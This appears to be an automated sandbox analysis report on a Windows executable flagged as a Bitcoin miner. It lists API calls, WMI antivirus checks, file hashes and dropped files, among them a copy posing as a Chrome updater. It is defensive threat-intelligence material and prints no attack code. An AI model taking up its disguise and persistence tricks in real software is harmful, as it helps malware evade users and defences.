Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

4_2_00007FF78AB31C64

Source: C:\Windows\System32\winlogon.exe

Code function: 7_2_00000225DC647A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_00000225DC647A40

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Windows Analysis Report
ylVAEHbMLf.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

ID:	1528506
Product:	CloudBasic
Start time:	00:25:54
Start date:	08.10.2024
Sample:	ylVAEHbMLf.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	3fb477ee2214bf2d4ed7df2d23f159e8
SHA1:	836c3f3b4b8f02e495703767b6bf923c453dba36
SHA256:	508821549db3334cccd6d492e17b29343ea5d0bda03379188c083e8c2217c291
Filetype:	Win64 Executable (generic) (12005/4) 74.95%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat	very short file (no magic)	93B885ADFE0DA089CDF634904FD59F71	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4r1h5sgd.ykz.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vq0xx0a.iij.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmqbykxu.pgm.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eymdjyc1.abr.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbjjoq4b.rpe.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfzibsx3.xyg.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5qmnddi.kvm.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1zkfp5t.vkr.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_md4nxhqm.jbz.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfctb52a.40a.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_og042ud3.2x3.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oq1gmedo.efo.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1wrrvnu.y00.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_re5qjll5.sre.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uefuje10.peg.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv0o1bgn.s1b.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	997A51E9EB3A909EE9A0C1CDF1AFFDDC	8A293E4F835A79CC13966677180653984B39ACD5	5195EA12FCDC46E208662607CA7C0A062D0AC3A91B0F7228EE48E8A42A12B746
C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	3FB477EE2214BF2D4ED7DF2D23F159E8	836C3F3B4B8F02E495703767B6BF923C453DBA36	508821549DB3334CCCD6D492E17B29343EA5D0BDA03379188C083E8C2217C291
C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	DA464F9AEE5320C3B415CD967E6D2A20	CA25E9721564A73C9F105DEA3C3594FA35DE81EC	0FF6E67F4C64C709B0D68E306FBB662D050F42723091D5BCE6DB6314C9C7F8F9
C:\Windows\System32\winevt\Logs\Application.evtx	data	47F0BD90C8940566F440FBC90833EF62	B7723CF02BCEBF9B830F509B58C48386837FCB76	8AC71BF9F4C67D1FB3FFC3EB5856E6C5C581C59801629E03B10AE5FCCB1D8782
C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx	MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 304, DIRTY	648054A96924A2C5307E5F8C98995FC2	371E321D0CB43CD38F9BAB15F3A8D802A4100BD2	D6DF7454612E6E107654B2715EF4324BEB7BA5083D506FFCA1D6AB16882E212B
C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx	data	26C4C5213F3C6B727417EF07207AC1E0	1815CC405C8B70939C252390E2A1AEC87EFF45F2	767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx	data	6087F7A271816C7AF52FD8DB8DE6F6FA	6360719C6D0E5916B2FF30BF8968AD06496D6F5B	7B970D46E047FC2A67C549F2A65F019EC350AD55BEFBDF474FD835C9B75F5601
C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx	data	C8075C4B407B2F8A2DC4553F58DB6529	191F48FF541EF904C7AF761333D0A235D289EE0C	E9834CEC17491574BBF11920B6A9E080BA512E12385CCB71D99341BBEB6E7E78
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 2, DIRTY	3FB83F59849012EA2FEC5DE77A2A92A1	808D3C9314E6AAF56DFC3EE3E8D7E65CA43EC55C	B14A0A708E3818CB8BA1D2B806EA5FA57B12893F1C52B8F91D310280D4CA26FC
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx	data	4FB8E2CF8B3F20534836684947962DC2	B263607E627C81DA77DB65DF5AED2F3FD84B83E2	DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	data	2DE60575CB719BF51FAB8A63F696B052	BD44E6B92412898F185D5565865FEA3778573578	7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx	data	51300ED21A496B61B4D65BEF7934C70B	58833E7B9784167CA4795E74198DAAD57C86D615	EE861A09108174FCC941817E1BF4D6BF9754FE24BB4D4DA6A5A04CC36182AF3F
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx	data	B8E105CC52B7107E2757421373CBA144	39B61BEA2065C4FBEC143881220B37F3BA50A372	B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx	data	39EE3557626C7F112A88A4DE12E904C1	C307FECC944D746A49EEA6451B7DA7301F03504C	2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx	data	93BC7C28E3A7B0EC7634432FFB5F26AE	388548D6291DA80F672153D1C18E32BDA335AA90	D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx	data	A2D41740C1BAF781019F282E37288DDF	A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621	7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx	data	A00BAFFCABB00428EA0512FCECCC55E5	19F7C942DC26C3FF56D6240158734AFF67D6B93E	92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx	data	399CAF70AC6E1E0C918905B719A0B3DD	62360CD0CA66E23C70E6DE3340698E7C0D789972	FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx	data	2BB73ACC8F7419459C4BF931AB85352C	F1CE2EB960D3886F76094E2327DD092FC1208C7E	1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx	data	86AEA3A9CA3E5909FD44812754E52BD6	F79B583F83F118AC724A5A4206FC439B88BB8C65	2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx	data	155681C222D825199B738E8DEC707DC8	704C800E7313F77A218203554E1428DF2819BC34	1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx	data	F22AC858C2ACC96E8F189E43FFE46FBD	540B8276921D37FCFFDA3FC7BCFAE1D99A85433B	771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx	data	6C3F290FC62CFA9C240AEE8DB1DBA277	CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC	7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx	data	8630011707C7BFBCECC0A9430637802E	22247A5B6A4C01883BB14E0BD4575A3553F945CB	227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx	data	A51AFE78FA4481FA05EDC1133C92B1D8	5BA44E7A99EE615E323696742DA6B930E9FF6198	44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx	data	A8ADBDC2B39B55444B2C844F7D81EBDE	F97F40E314C8A2A39953A28CB72C9270D3073418	93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx	data	D47A0ECFAB79D50C82A735D877B18E6C	B922759558C794A227CC783DA2E211FE669156C1	4316CDA2E6C3EDF01E86A5549C7B16B18B62BD2F3D3669E7A4CD66FCD987E9BA
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx	data	9EAAD7982F42DFF47B8EF784DD2EE1CC	542608204AF6B709B06807E9466F7543C0F08818	5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx	data	4F68D6AF0C7DB9E98F8B592C9A07811C	9F519109344DD57150F16B540AAA417483EF44FE	44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx	data	CAB3444FEB030AD59FEF1789AE41FE46	BF0497F84C43EF29B2908E0E0BCAD9D813346310	D40F3BAC2398207DB6DC1B31B86CED409077BBAD1198F75BA67154BF728070CC
C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx	data	788871A00E6C27C90BB908A72EDDA1E8	19157CCCAADBA0994CB2F0519606CE31628ECFEB	A07C6E6CFFFDC79DC13D91E7ABD0AA8903ABF9847207B43912C61F2FBAB44C48
C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx	data	B074238315662886E2BD70106D08A747	5ADA158D19401565E76349FCA97489E9FB9BFA36	53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx	data	7E157981F49B4361EB3619CCE1291694	CAD8C707B3E3D29E5F02E10B6EAE245FBF4B67E2	F345ECF7939E71EA8FFFCB45BC70825228E33A83089C2700917A421568FA2738
C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx	data	E6E4C860CE7DD1BB499D6A082B461B90	11330861B23B1D29D777D9BD10619A07B6A6A9C0	C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
